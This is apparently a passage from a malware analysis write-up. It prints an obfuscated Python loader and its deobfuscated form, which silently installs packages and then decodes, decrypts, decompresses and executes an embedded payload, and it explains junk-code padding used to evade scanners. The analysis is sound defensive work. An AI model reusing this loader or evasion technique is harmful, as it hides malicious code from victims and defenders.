AgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIE9tbGNEWU1qZUs6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKJ2hVY28yYlNTWDMnClFzdEhEbWJCMmUgPSAyOTQ3ODY1Nwp2ZUphTGVYYVRnID0gODYxNDU3ODQKeWNTNmRpVkVWSSA9IDYxMTE5NTA4CnMgPSBbYid6VHNrb1lHbTY4VnJTaU9NNko5VzBQcXlLVGZTeXJhTTBOeWRWbUp2TV9rPScsIGIncGNEMjNiUlFUTDFNcUxTODROZFBzaVBkWUpsd2JUYWFsNkptdWx6VHE0az0nLCBiJzlFQlFORGpteTByR1hDYlZnVm5yZ0ZGc0FIazRZZTFNOHkxR1NJeDlDUFk9JywgYic2NjNSbks1bDBNUXpld2ZwQVFmWWhKYkwzcDdaUm9SLWo3STNEa1hpVUlrPScsIGInSTVBcnhrZ2ZvMkU1NlZCVmN0RmpKLXBGa2VCYlFnNlFYTXVHLWdOZ3FxND0nLCBiJ2VYUDFzS2ZrVEU5UE5rV1I4ckE5anpKcXVuODB5TVlQcnpNTWk2NUpRcHc9JywgYic1NlM5U3Y3elVQTDcxdzZOMk9UU3d4dkZsX2EtNXp2c042cnhRSTk3VVdVPScsIGInZ1pjUk1hVmZ0TWdfRjlFNHROUV9ldEFSN19QS1RfdlZmV3dXa01TeERRYz0nLCBiJy1YbWFLTDR1bzRwMGdNNUFSUVp0eGpaXzVlY0sxdzUzQUVrV3VpV0RJelE9JywgYidpa05mQnRyclgtOUVCSTNpS3pXbkJKVzV3Tk52aThyTTRvVDlCTHFESk53PScsIGIndUVpa0hhSEFYMUIyMGFCX2JjUXdVQTBhTzIxQWktcmdZQXFHZkt4SEtKQT0nLCBiJ2Rlb0hUd052d1RPdVFqb3k1b2g5ak5fWlFsTGJWQ3Z3STQ3RDNzUXQ4VUE9JywgYid4dWFEN0Jxd3JlbmlLWkF2Qk8zOE1PMjUwb080MEhYYm94aFU4LS02WVEwPScsIGInWDVHZllfenVrSURQS3h5em1NWUZrcHMtQXY4QW8yVFFEUG1ja3JqYjNaUT0nLCBiJ0NBT0Q3WFNXNGUtT04zM3V6NV84aDZSWmhvckRsS2c3OThlMVJjRVlTbG89JywgYidkTXBod2x3TzZRaF9GQ2RiTXpzZW9ac1drUVdQRnRHeDhWU2lGQU4yU1NvPScsIGIncTROZmNSaWVMSUtueUJ3RkVoVXhaY1JfOEEzQkZTX25fY0lFOHNGWDhhND0nLCBiJ2hMZkFQUjA2eHVvNTQ1cUpsemxZa281ZjlLS3VYT0JyQ0JOZ3pydVRWMTQ9J10KZm9yIGtleSBpbiBzOgogICAgdHJ5OgogICAgICAgIGRlY3J5cHRlZF9jb2RlID0gaFhSR0RHQ1BUclJ2Ynp3YVVsRmJtUUNvRDhPQ1k0cmpZQ094TjUoa2V5LmRlY29kZSgidXRmLTgiKSkuZGVjcnlwdChlbmNyeXB0ZWRfY29kZSkKICAgICAgICBicmVhawogICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgIHBhc3MKeyd1c2VybmFtZSc6ICdzemVDanhhJywgJ2FnZSc6IDI0fQpPSzV6cHJPSkhHID0gNTU4NzU4NTkKY2xhc3MgZUdsYVNMVVdkRjoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBUcnVlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBSRnNyWlFkdFdROgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpUaTJYN1k1MjFFID0gMjM2MDA3NDUKQWJKRG1HOUI4dSA9IDE5OTM1MzU4CmNsYXNzIHNkQWtVUThjSFQ6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhClsiJ2dmSGFZZGFmRVonIiwgIid5MlJ4ZnZ1TVcwJyIsICInV0NUQXhiWm5EWiciLCAiJ0RYNk5WUHIxcFMnIiwgIidwRTlmOHd4aGxKJyJdCmNsYXNzIG9iTm9EdGpSeDM6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUFZVTFR6aDg5YToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgbXJLaWRwamljdzoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKeFY0NzhqVVFCdCA9IDIzNzQ3NTI2CmNsYXNzIFM1NTJ1WDhJbHM6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKeDZReVFUWTRDQSA9IDc4MzExNzAKY2xhc3Mgd0RvQUJ6WlE0eToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBUcnVlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpaSmphTXp5WW1qID0gMzM0OTc2MjkKUXJnMkFjRUsxOCA9IDExMTkwNDMwCmNsYXNzIGtJMlBPT21uWjY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIE9tbGNEWU1qZUs6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKJ2hVY28yYlNTWDMnClFzdEhEbWJCMmUgPSAyOTQ3ODY1Nwp2ZUphTGVYYVRnID0gODYxNDU3ODQKeWNTNmRpVkVWSSA9IDYxMTE5NTA4CmRlY29tcHJlc3NlZF9jb2RlID0gemxpYi5kZWNvbXByZXNzKGRlY3J5cHRlZF9jb2RlKS5kZWNvZGUoJ3V0Zi04JykKQ1NlbFlGTnBZQVg0amhmTWlVRVFHV1EzTW9jY2hURE16b2pQV0QoZGVjb21wcmVzc2VkX2NvZGUpCnsndXNlcm5hbWUnOiAnc3plQ2p4YScsICdhZ2UnOiAyNH0KT0s1enByT0pIRyA9IDU1ODc1ODU5CmNsYXNzIGVHbGFTTFVXZEY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUkZzclpRZHRXUToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKVGkyWDdZNTIxRSA9IDIzNjAwNzQ1CkFiSkRtRzlCOHUgPSAxOTkzNTM1OApjbGFzcyBzZEFrVVE4Y0hUOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpbIidnZkhhWWRhZkVaJyIsICIneTJSeGZ2dU1XMCciLCAiJ1dDVEF4YlpuRFonIiwgIidEWDZOVlByMXBTJyIsICIncEU5Zjh3eGhsSiciXQpjbGFzcyBvYk5vRHRqUngzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIFBWVUxUemg4OWE6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIG1yS2lkcGppY3c6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCnhWNDc4alVRQnQgPSAyMzc0NzUyNgpjbGFzcyBTNTUydVg4SWxzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCng2UXlRVFk0Q0EgPSA3ODMxMTcwCmNsYXNzIHdEb0FCelpRNHk6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKWkpqYU16eVltaiA9IDMzNDk3NjI5ClFyZzJBY0VLMTggPSAxMTE5MDQzMApjbGFzcyBrSTJQT09tblo2OgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBPbWxjRFlNamVLOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCidoVWNvMmJTU1gzJwpRc3RIRG1iQjJlID0gMjk0Nzg2NTcKdmVKYUxlWGFUZyA9IDg2MTQ1Nzg0CnljUzZkaVZFVkkgPSA2MTExOTUwOAo="
CSelYFNpYAX4jhfMiUEQGWQ3MocchTDMzojPWD(base64.b64decode(PZcTmMLNDhGxIyuHWAnzp4HJYLcvrDIwkJzqlN))
{'username': 'szeCjxa', 'age': 24}
OK5zprOJHG = 55875859
class eGlaSLUWdF:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class RFsrZQdtWQ:
def __init__(self):
self.data = False
def get_data(self):
return self.data
Ti2X7Y521E = 23600745
AbJDmG9B8u = 19935358
class sdAkUQ8cHT:
def __init__(self):
self.data = False
def get_data(self):
return self.data
["'gfHaYdafEZ'", "'y2RxfvuMW0'", "'WCTAxbZnDZ'", "'DX6NVPr1pS'", "'pE9f8wxhlJ'"]
class obNoDtjRx3:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class PVULTzh89a:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class mrKidpjicw:
def __init__(self):
self.data = False
def get_data(self):
return self.data
xV478jUQBt = 23747526
class S552uX8Ils:
def __init__(self):
self.data = True
def get_data(self):
return self.data
x6QyQTY4CA = 7831170
class wDoABzZQ4y:
def __init__(self):
self.data = True
def get_data(self):
return self.data
ZJjaMzyYmj = 33497629
Qrg2AcEK18 = 11190430
class kI2POOmnZ6:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class OmlcDYMjeK:
def __init__(self):
self.data = True
def get_data(self):
return self.data
'hUco2bSSX3'
QstHDmbB2e = 29478657
veJaLeXaTg = 86145784
ycS6diVEVI = 61119508
This is a long file and if you look it carefully, you will see there are so many pieces of code that have the same content and they are repeated. But there are some lines that unique (they are different from others):
From here I can understand that they use this technique to make detection and analysis more challenging, especially with some online analysing services like Virustotal, Hybrid Analysis… Because that I have to deobfuscate it so that I can analyse it easily. As I told you first, there are many repeated lines and not related so I will remove them. After removing, this is final result:
from sys import executable, stderr
import ctypes;import base64,subprocess,sqlite3,json,shutil
import time
from importlib import import_module
requirements = [
["requests", "requests"],
["Cryptodome.Cipher", "pycryptodomex" if not 'PythonSoftwareFoundation' in executable else 'pycryptodome']
]
for modl in requirements:
try:
import_module(module[0])
except:
subprocess.Popen(executable + " -m pip install " +modl[1], shell=True)
time.sleep(3)
from json import loads, dumps
from urllib.request import Request, urlopen
try:
from cryptography.fernet import Fernet
except:
subprocess.run("python -m pip install cryptography")
try:
from cryptography.fernet import Fernet
except:
subprocess.run("python -m pip install cryptodomex", shell=True)
try:
import requests
except:
subprocess.run("python -m pip install requests", shell=True)
try:
from Cryptodome.Cipher import AES
except:
subprocess.Popen(executable + " -m pip install pycryptodome ", shell=True)
from Crypto.Cipher import AES
import requests
CSelYFNpYAX4jhfMiUEQGWQ3MocchTDMzojPWD = exec
import concurrent.futures
PZcTmMLNDhGxIyuHWAnzp4HJYLcvrDIwkJzqlN="CmltcG9ydCB0aW1lCnsndXNlcm5hbWUnOiAnc3plQ2p4YScsICdhZ2UnOiAyNH0KT0s1enByT0pIRyA9IDU1ODc1ODU5CmNsYXNzIGVHbGFTTFVXZEY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUkZzclpRZHRXUToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKVGkyWDdZNTIxRSA9IDIzNjAwNzQ1CkFiSkRtRzlCOHUgPSAxOTkzNTM1OApjbGFzcyBzZEFrVVE4Y0hUOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpbIidnZkhhWWRhZkVaJyIsICIneTJSeGZ2dU1XMCciLCAiJ1dDVEF4YlpuRFonIiwgIidEWDZOVlByMXBTJyIsICIncEU5Zjh3eGhsSiciXQpjbGFzcyBvYk5vRHRqUngzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIFBWVUxUemg4OWE6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIG1yS2lkcGppY3c6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCnhWNDc4alVRQnQgPSAyMzc0NzUyNgpjbGFzcyBTNTUydVg4SWxzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCng2UXlRVFk0Q0EgPSA3ODMxMTcwCmNsYXNzIHdEb0FCelpRNHk6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKWkpqYU16eVltaiA9IDMzNDk3NjI5ClFyZzJBY0VLMTggPSAxMTE5MDQzMApjbGFzcyBrSTJQT09tblo2OgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBPbWxjRFlNamVLOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCidoVWNvMmJTU1gzJwpRc3RIRG1iQjJlID0gMjk0Nzg2NTcKdmVKYUxlWGFUZyA9IDg2MTQ1Nzg0CnljUzZkaVZFVkkgPSA2MTExOTUwOAppbXBvcnQgemxpYgppbXBvcnQgYmFzZTY0CnsndXNlcm5hbWUnOiAnc3plQ2p4YScsICdhZ2UnOiAyNH0KT0s1enByT0pIRyA9IDU1ODc1ODU5CmNsYXNzIGVHbGFTTFVXZEY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUkZzclpRZHRXUToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKVGkyWDdZNTIxRSA9IDIzNjAwNzQ1CkFiSkRtRzlCOHUgPSAxOTkzNTM1OApjbGFzcyBzZEFrVVE4Y0hUOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpbIidnZkhhWWRhZkVaJyIsICIneTJSeGZ2dU1XMCciLCAiJ1dDVEF4YlpuRFonIiwgIidEWDZOVlByMXBTJyIsICIncEU5Zjh3eGhsSiciXQpjbGFzcyBvYk5vRHRqUngzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIFBWVUxUemg4OWE6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIG1yS2lkcGppY3c6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCnhWNDc4alVRQnQgPSAyMzc0NzUyNgpjbGFzcyBTNTUydVg4SWxzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCng2UXlRVFk0Q0EgPSA3ODMxMTcwCmNsYXNzIHdEb0FCelpRNHk6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKWkpqYU16eVltaiA9IDMzNDk3NjI5ClFyZzJBY0VLMTggPSAxMTE5MDQzMApjbGFzcyBrSTJQT09tblo2OgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBPbWxjRFlNamVLOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCidoVWNvMmJTU1gzJwpRc3RIRG1iQjJlID0gMjk0Nzg2NTcKdmVKYUxlWGFUZyA9IDg2MTQ1Nzg0CnljUzZkaVZFVkkgPSA2MTExOTUwOApmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSwgc3RkZXJyCgoKdHJ5OgogICAgaW1wb3J0IGNyeXB0b2dyYXBoeQpleGNlcHQgSW1wb3J0RXJyb3I6CiAgICBzdWJwcm9jZXNzLnJ1bigncHl0aG9uIC1tIHBpcCBpbnN0YWxsIGNyeXB0b2dyYXBoeScsIHNoZWxsPVRydWUpCiAgICBmcm9tIGNyeXB0b2dyYXBoeS5mZXJuZXQgaW1wb3J0IEZlcm5ldAoKaW1wb3J0IHN1YnByb2Nlc3MKZnJvbSBpbXBvcnRsaWIgaW1wb3J0IGltcG9ydF9tb2R1bGUKCnJlcXVpcmVtZW50cyA9IFsKICAgIFsicmVxdWVzdHMiLCAicmVxdWVzdHMiXSwKICAgIFsiQ3J5cHRvZG9tZS5DaXBoZXIiLCAicHljcnlwdG9kb21leCIgaWYgbm90ICdQeXRob25Tb2Z0d2FyZUZvdW5kYXRpb24nIGluIGV4ZWN1dGFibGUgZWxzZSAncHljcnlwdG9kb21lJ10KXQpmb3IgbW9kbCBpbiByZXF1aXJlbWVudHM6CiAgICB0cnk6CiAgICAgICAgaW1wb3J0X21vZHVsZShtb2R1bGVbMF0pCiAgICBleGNlcHQ6CiAgICAgICAgc3VicHJvY2Vzcy5Qb3BlbihleGVjdXRhYmxlICsgIiAtbSBwaXAgaW5zdGFsbCAiICttb2RsWzFdLCBzaGVsbD1UcnVlKQogICAgICAgIHRpbWUuc2xlZXAoMykKCmltcG9ydCByZXF1ZXN0cwoKZnJvbSBjcnlwdG9ncmFwaHkuZmVybmV0IGltcG9ydCBGZXJuZXQgYXMgaFhSR0RHQ1BUclJ2Ynp3YVVsRmJtUUNvRDhPQ1k0cmpZQ094TjUKCnRyeToKICAgIGZyb20gQ3J5cHRvZG9tZS5DaXBoZXIgaW1wb3J0IEFFUwpleGNlcHQ6CiAgICBzdWJwcm9jZXNzLlBvcGVuKGV4ZWN1dGFibGUgKyAiIC1tIHBpcCBpbnN0YWxsIHB5Y3J5cHRvZG9tZSAiLCBzaGVsbD1UcnVlKQogICAgZnJvbSBDcnlwdG8uQ2lwaGVyIGltcG9ydCBBRVMKICAgIAplbmNvZGVkX2NvZGUgPSAiWjBGQlFVRkJRbTB3ZEZWdFJrSjZkVGhzWXpWNVFrWnZUblJRUTNoRVJIQnFhazVJWVZkRFZGQktYMjQ1UTFWWlJIVkZWakY2VGtGT1RqZFZURmt5Y1c1eVpVUk9SRXBMYkV0bFMyMUdUMm8zUlRKM1NEWkZVRk5WTVZJdFFtbExaVzVJZURjeFRWTTVjMjVxV0VvM1N6ZzRURWc0YWpWUVJrOVBSWEo1UldoMFpFTjNXR2RPWWtSVFF6WTRiMVZpYW5weU9IUjVVbk4wTkRoTVFVVmhWekIxWmpaaVNYSkdhRzFvWVVzNFNuVTJjMEowU2pKTmQyNXhSMWszWVU5c1IzbFZjM2x2Y1U1U1pXUlhWRkZWWVZOeWFsUndibEEwVTIxT1NERTFWVWgwYlZwdmFrbzNSMjkzWkRKTmEwOXlhRWMyTXpVdFFXaG5jSGhDUXpsMVozVk9SRkZyVlhVek5rRm1PVk5YYzFSbk5FMTVWWFJOYnpSd1h6Vm5SRVp0WlVGTE4wOVNNM0UzWTI5aVZuVmlXRWhtTTB0T2FtczJaRzk1Wm5KaGJrSkxiblJuTVRabWJtUk9hbk00V1hWQ2JGQk5NeTFxYzBGWFZHWlhablpUWkdkdVVrTnFTV2RXTFU5RlVYZGhhMFEwZEZkR01YUmZiWEZoZG1kWmJETlhObUZzTVhobmJIaHJWM0U1YkZrM2RYTkJTMHRuVm0xaFVtTTJjVEJxT1dSNGRXMVpNMHBtVm5SWGNqUldUbkpWUkdkMmRWbEdiR0Z1Wm14MlZHeGxlbXhmU3pOVk5WVnhiRWxIZDA0emJGVnhPRXBZWDI5aU0xSnFRVXBqVTE5b1oxOUxNbGhZY0RZMlFVUnRWSGxMT1hSRFNsQkpTMUJ1YldzeWVsRmhaM3BPTFU5UlIwcElhVTUwYlcxMmQyVklRM3AwTXpkWlNYY3RZbEJSTVc0MFRFUmFWR05zYm1WQ01XNUhXVkZZV25ZMWIwa3pUV2RQVVU0d2MzWjRka05QU0VOWE9UUnNUVmR4WDFoVWVrdFJjR3RxZVd3NWVHOTRjMGsyT0dWWWVEVlJkWGhVYlZFd1p6TkRja2czZFU5U01rUnBaMlZTVW1wVlFrWlBXbWN4Y2xWYVFYUlZNbWxKZFVGcVZ5MUZOVXRsUm1GRVlXZFRSRWxYVlVoTk9ITkxRbDlYYkU5ZlRFMVhZa0ZOZEhORWNWaHNjbTF2VnpRelMxUXljbTB5Y2taSFEwb3dOVEpyYUcwNFUxcE1OMVZOTFhNMmFEbDBObVUwUTJsYVNtbzVOblZpUkdoUFVrTTVSbGRITjJoVGQyZDZkRk13ZVMxMGFFcEhaVzVLTWtKZlJHVkdkSEZtVlV4TlVtMUZSMFZXUlhWSmNuSTRiVk5hZEZSdVUwcHNWemw0UlhwV1pFaGthbVpTYjI5blVVaEZia1p0WlZOVWMyOTVUWE5ZZDJGNk9VVjFlVGhaTUVSM01qSmxNSFZrYVRWUFYwbHFUVEV5ZUV4NlptVktVMnRoZFhaQ1EzVk1VMGhqY2tOVVlUVXhaM1pWWlhSWlFuZHhXbVk1V2tab1NHdFdiM014TUVzdFoyWnRWa3RqWTJsSGFsbG9UMGd6ZUMxSmJVNUZOVEYyU0VwSmQzTnlYMEpsY1VSRloyVjBZMU5EVkZwNE16bDZaRE5rYWxGSFZrbDNUemRrVDJGMGVVaEdUV3d3YkdoaFkwUnNZVEJKVTFnd1ZITnVWMGxoTW5oVVFYbDFla1J1V21RNFpHWjVWMnhpY0cxU2ExZEdPR053WkRaNFExSnJORFpSVkRCR09GRnFiVnBLYmpCbGNHdHdRa3hSUW5Fd2RISlBXV3hHVmxwQllWUlRUakUxYVRCUlh6QllhV0ZzUjJNNVJsWlBZMjR0WVVGc1RISkVPWFpQT0ZjME9HWTRSRGhDWkdaWWVtZHFPR2RaZFROb1EzTmxUVzF1WTJSTU9HOXVVblZtVDFoWVVFUkNTbWRMWjNSMFRVSkZiVWhFUjFGTGQyWTVVa2xJVkhkak5IVm9hRGRXYm5CcVJXOVNYMUZQVjJ4RmRXSnNPRXhMVkV0ZmFpMXJZbWRXWmpGM04wUXdOMDF4Y1ZWWVVrWkNVMEp1ZGxBM1VWRjZRMFUwVjI1NU9VMUZVMGxHUm1Gd1FqaEZXWHBvU21wVFltRjNWbk5SUjFONVFUbHdjazV2ZUV0alRERldMVGxLYkZVMVFqRjRSVGhEWWtKNk1VSlJZMU5CTjFGMk9WSTVUMjB5V1hWc1ZrTTFRbVEwWTBKUmNXVlpOREpaY0ZCT2NWZDFkamxoWHpKVVFXSjJSWGxCUzJKcVUwTkVZakpTVUhsS00wcFBXRFZmTlhkaFdrTkZhVTFHV1U5QloydENURFJwVFRCMVNuSkphMDFCZG05aGVYb3dWVmhFYUZJMFJtOTJaVzlFTVdZNFdHSklaRWxYTlVjd2VFVnFaRWMwY2xGWk5URnBSV05rVDJ0R1JUUlNjMWRKUjIxVE0zcHRTMU4xYldSNlRuTjZRMGs1TlY5b1ZrVTFiSGxmWmxKVldta3RSekI0Yld4YWQyeENXbVJsTXkxdFVFOVdibmhCVm5wNFJXdFBjMWxsTVZvM2R6ZHBjbkZhTXpCTk1VSklkV1I0YW05bVdFUmxkWFZHYVdKdVVrRjJZVWd6WlVzMlRFdGFTM1ZsWVhWdkxVcE5kME15VTBOVE9VVmlaRFZmWVdJeVMxVjJNREF3VEdseVEyRm5UMWRhYlZOTVVFcERVa2xGZFcxRFJEQm9jbVI2VUZONWJrNWpSV3BuVjJSRFoyWnJTSGRhUlhoMlpUQlFaMkl3YjNWc1RXMVZiMlZ5VHpoc2JsSmlZaTB5VDJKd2EyWmZWVVUzT1dkdU9WWk9VRzFTU25OVVRYWlZWbVoxVkVGRE0yeFVhakZHVUdoNGNuWklUREpIU25GWU1VeFZWbDkxY0hkbVVuRmZOR2h6U0ZNMmJEVldXbDkyYVRaUFRrdHhUV2hMTTFwdlRGQldTVUpPWWpKNU1GUkpjMjVCUTNnMGR6QnlMWGxsVTBWck9HRmlUMDVETVUwMlVVazNaMFI0YWxCVVVHRkRXbWh3YW5oa01VcGlabVZKU0hNd1pGaHFXazg0U1VjeGFIRm1UM1JFUzNWeGIxODBWVXRyWlRk